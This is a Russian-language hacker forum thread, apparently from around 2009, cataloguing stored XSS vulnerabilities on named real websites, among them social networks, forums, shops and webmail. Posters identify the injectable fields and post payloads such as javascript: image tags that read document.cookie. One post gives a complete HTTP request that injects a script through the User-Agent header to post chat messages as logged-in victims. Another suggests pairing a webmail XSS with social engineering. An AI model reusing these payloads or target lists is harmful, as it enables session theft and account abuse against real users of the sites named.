http://compfaculty.net.ua/misc/index.php?a=117 з.ы. абсолютно согласен с автором статьи, ибо учусь на этом же факультете
Бесплатные форумы aimoo.com В профиле при редактировании подписи есть возможность вставить Ubb Code Code: [img]javascript:alert(document.cookie);[/img] http://ligendo.aimoo.com/General-Discussion/Welcome-to-Aimoo-Useful-Tips-you-need-to-know-1-172013.html
Социальная сеть privet.ru PR:4 тИЦ:1800 В персональных сообщениях вставляем картинку с адресом javascript: и так далее.... воен знае, что делать!!1
Nightlife.ua Крупный клубный портал. Везде, где есть комментарии- уязвимы теги вставки изображения и гиперссылки. В личных сообщениях тоже. Code: http://nightlife.ua/gallery/cat/1088/photo/44496/ жмем на ссылку в коменте- и тут ололо пыщ пыщ алирт риальне!!11
http://www.voshod-avto.ru/catalogue.php?binn_rubrik_pl_catelems1=25609 активное поле: "По наименованию:" P.S на alert у меня не сработало на на iframe срабатывает CMS: BinN S.Builder
http://saret-auto.ru/model/pilot/configurator/#forma Уязвимы все поля кроме "Дополнительной информации:" тоже сработал только iframe
vorum.ru - вопросы и ответы на любую тему При заполнении профиля уязвимо поле "Имя". Но есть ограничение в 25 символов
[email protected] В теле письма уязвим тег <img> Но злой фильтр превращает Code: javascript:alert() в Code: [B]x[/B]javascript:alert() А вот когда жертва нажимает "Reply"- код срабатывает. Так что в связке с СИ баг вполне рабочий. Проверено на Opera 9.63 IE- не сработало
http://www.articles.turne.com.ua/fotoreportazh-p-photo-716 Уязвимо поле Имя при добавлении коментария !
my.opera.com В профиле пользователя, в графе "Web site" принимается JS. Для срабатывания необходимо нажать на ссылку.
dbservermanager.com Уязвимы поля : "Your Name" and "Testimonial" aromatshop.com Уязвимы поля : "Имя:" and "Отзыв" во всех ID
Активная XSS в NeverLands.ru Вообщем давно обнаружил, ну думаю выложу) Уязвимость появилась как администрация ввела "подробности" в отчёты по входам пользователей а точнее с какого браузера вошли или была попытка входа) Вообщем уязвимый параметр User-Agent ну и так как логируются и неправильные входы то чтобы заюзать уязвимость знание правильного пароля необязательно! Пример использования: Code: POST http://www.neverlands.ru/game.php HTTP/1.0 Accept: */* Referer: http://www.neverlands.ru/index.cgi Accept-Language: ru Content-Type: application/x-www-form-urlencoded Proxy-Connection: Keep-Alive [COLOR=Red]User-Agent:[/COLOR] [B]<script>top.frames['ch_buttons'].document.FBT.text.value="HACKED_BY_TROJAN_:008:";top.frames['ch_buttons'].document.FBT.sbmsg.click()</script><b>TROJAN</b>[/B] Host: www.neverlands.ru Content-Length: 58 Pragma: no-cache Cookie: watermark=МЕТКО player_nick=[COLOR=Green]ЛОГИН[/COLOR]&player_password=[COLOR=Green]ПАСС[/COLOR]&x=1&y=1 Ну и результатом такого пакета будет видимая надпись TROJAN вместо браузера) и выполненный скрипт который передаёт команду отправить сообщение нижнему фрейму и в чате увидим Code: ЛОГИН: HACKED_BY_TROJAN_[IMG]http://s50.radikal.ru/i130/0901/82/ad5ae76cf1a4.gif[/IMG] P.S. На момент публикации всё работает! 27.01.2009 баг пофиксили теперь при любом браузере пишется Undefined ( в переводе "неопределён") TROJAN (с)
активная XSS на сайте Эльдорадо www.eldorado.ru (http://eldorado.com.ua/) регистрируемся на форуме уязвимо поле ИМЯ